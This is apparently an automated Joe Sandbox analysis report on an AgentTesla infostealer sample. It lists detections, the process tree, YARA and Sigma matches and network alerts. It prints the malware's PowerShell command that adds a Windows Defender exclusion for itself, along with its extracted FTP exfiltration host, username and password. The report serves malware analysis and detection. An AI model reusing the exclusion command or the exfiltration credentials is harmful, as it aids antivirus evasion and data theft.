Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hesaphareket.exe

Overview

General Information

Sample name:hesaphareket.exe
Analysis ID:1561748
MD5:f698edb1fcf31bb642bc2e18b3f05813
SHA1:b73dbfbedbe4bc7fad70def31c2bf94ec18ff992
SHA256:5618efb4038198984ccca27de0dd5850a697038d9f0c2a9ad26b17bb26cc0f7b
Tags:exegeoTURuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hesaphareket.exe (PID: 6188 cmdline: "C:\Users\user\Desktop\hesaphareket.exe" MD5: F698EDB1FCF31BB642BC2E18B3F05813)
    • powershell.exe (PID: 5272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • hesaphareket.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\hesaphareket.exe" MD5: F698EDB1FCF31BB642BC2E18B3F05813)
    • hesaphareket.exe (PID: 5360 cmdline: "C:\Users\user\Desktop\hesaphareket.exe" MD5: F698EDB1FCF31BB642BC2E18B3F05813)
    • hesaphareket.exe (PID: 7212 cmdline: "C:\Users\user\Desktop\hesaphareket.exe" MD5: F698EDB1FCF31BB642BC2E18B3F05813)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.hesaphareket.exe.37e9150.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.hesaphareket.exe.37e9150.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.hesaphareket.exe.37e9150.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3122b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3129d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31327:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x313b9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31423:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31495:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3152b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x315bb:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.hesaphareket.exe.37e9150.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2e6ae:$s2: GetPrivateProfileString
                  • 0x2dd58:$s3: get_OSFullName
                  • 0x2f3ea:$s5: remove_Key
                  • 0x2f58f:$s5: remove_Key
                  • 0x30458:$s6: FtpWebRequest
                  • 0x3120d:$s7: logins
                  • 0x3177f:$s7: logins
                  • 0x34490:$s7: logins
                  • 0x34542:$s7: logins
                  • 0x35e3e:$s7: logins
                  • 0x350dc:$s9: 1.85 (Hash, version 2, native byte-order)
                  0.2.hesaphareket.exe.3823770.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 17 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareket.exe", ParentImage: C:\Users\user\Desktop\hesaphareket.exe, ParentProcessId: 6188, ParentProcessName: hesaphareket.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", ProcessId: 5272, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareket.exe", ParentImage: C:\Users\user\Desktop\hesaphareket.exe, ParentProcessId: 6188, ParentProcessName: hesaphareket.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", ProcessId: 5272, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareket.exe", ParentImage: C:\Users\user\Desktop\hesaphareket.exe, ParentProcessId: 6188, ParentProcessName: hesaphareket.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe", ProcessId: 5272, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-24T08:22:44.191583+010020299271A Network Trojan was detected192.168.2.1149712104.247.165.9921TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-24T08:22:45.338474+010028555421A Network Trojan was detected192.168.2.1149724104.247.165.9957378TCP
                    2024-11-24T08:22:45.459003+010028555421A Network Trojan was detected192.168.2.1149724104.247.165.9957378TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 7.2.hesaphareket.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
                    Multi AV Scanner detection for domain / URL
                    Source: ftp.normagroup.com.trVirustotal: Detection: 11%Perma Link
                    Source: http://ftp.normagroup.com.trVirustotal: Detection: 11%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: hesaphareket.exeReversingLabs: Detection: 57%
                    Source: hesaphareket.exeVirustotal: Detection: 58%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: hesaphareket.exeJoe Sandbox ML: detected
                    Source: hesaphareket.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: hesaphareket.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 4x nop then jmp 06D5A068h0_2_06D59739
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 4x nop then jmp 06D5A068h0_2_06D59788

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.11:49724 -> 104.247.165.99:57378
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.11:49712 -> 104.247.165.99:21
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.11:49724 -> 104.247.165.99:57378
                    Source: Joe Sandbox ViewIP Address: 104.247.165.99 104.247.165.99
                    Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                    Source: unknownFTP traffic detected: 104.247.165.99:21 -> 192.168.2.11:49712 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 10:22. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 10:22. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 10:22. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 10:22. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: ftp.normagroup.com.tr
                    Source: hesaphareket.exe, 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3772427480.0000000002CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.normagroup.com.tr
                    Source: hesaphareket.exe, 00000000.00000002.1331722297.000000000262A000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: hesaphareket.exeString found in binary or memory: http://tempuri.org/ianiDataSet.xsd
                    Source: hesaphareket.exeString found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
                    Source: hesaphareket.exeString found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
                    Source: hesaphareket.exe, 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, oAKy.cs.Net Code: _5754M2
                    Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, oAKy.cs.Net Code: _5754M2
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\hesaphareket.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\hesaphareket.exeJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_00B5D51C0_2_00B5D51C
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D5B2B80_2_06D5B2B8
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D576F80_2_06D576F8
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D554200_2_06D55420
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D594280_2_06D59428
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D505480_2_06D50548
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D54FE80_2_06D54FE8
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D51F180_2_06D51F18
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D56B480_2_06D56B48
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D558580_2_06D55858
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 0_2_06D558480_2_06D55848
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_02BE4A607_2_02BE4A60
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_02BE3E487_2_02BE3E48
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_02BE9C787_2_02BE9C78
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_02BED2007_2_02BED200
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_02BE41907_2_02BE4190
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_062456B87_2_062456B8
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_06242EF87_2_06242EF8
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_06243F287_2_06243F28
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_0624DC007_2_0624DC00
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_06248D177_2_06248D17
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_062405B87_2_062405B8
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_062436307_2_06243630
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_06244FD87_2_06244FD8
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_0638DD407_2_0638DD40
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_0638F0E87_2_0638F0E8
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_063811287_2_06381128
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_063811237_2_06381123
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_02BED1F37_2_02BED1F3
                    Source: C:\Users\user\Desktop\hesaphareket.exeCode function: 7_2_02BE9C737_2_02BE9C73
                    Source: hesaphareket.exe, 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000000.00000002.1342710729.0000000007460000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000000.00000002.1331722297.0000000002637000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000000.00000000.1306850427.0000000000300000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamempwF.exe4 vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000000.00000002.1331722297.000000000262A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000000.00000002.1338678115.0000000004E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000000.00000002.1330120884.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000007.00000002.3771220303.0000000000B99000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareket.exe
                    Source: hesaphareket.exe, 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareket.exe
                    Source: hesaphareket.exeBinary or memory string: OriginalFilenamempwF.exe4 vs hesaphareket.exe
                    Source: hesaphareket.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: hesaphareket.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, ekKu0.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, vKf1z6NvS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, ZNAvlD7qmXc.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, U2doU2.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, BgffYko.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, HrTdA63.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, U5httJGmuF5DPKTAnl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, U5httJGmuF5DPKTAnl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/6@1/1
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareket.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyod5z2l.jkj.ps1Jump to behavior
                    Source: hesaphareket.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: hesaphareket.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\hesaphareket.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareket.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: hesaphareket.exe, 00000000.00000000.1306759432.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
